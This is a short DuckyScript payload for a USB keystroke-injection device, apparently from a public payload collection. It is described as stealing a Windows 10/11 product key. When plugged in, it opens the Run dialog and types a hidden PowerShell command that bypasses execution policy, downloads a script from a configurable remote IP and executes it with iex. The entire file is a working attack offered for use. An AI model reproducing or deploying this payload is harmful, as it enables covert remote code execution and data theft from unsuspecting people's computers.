REM     Title: Windows Product Duckey
REM     Author: Who-Is-Julien
REM     Description: This payload exfiltrate the target's Windows product key to a remote server.
REM     Target: Windows 10, 11

REM     Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
DEFINE REMOTE_IP_ADDRESS 192.168.1.10


DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
STRING REMOTE_IP_ADDRESS
STRING /script.ps1; iex $pl
DELAY 500
ENTER
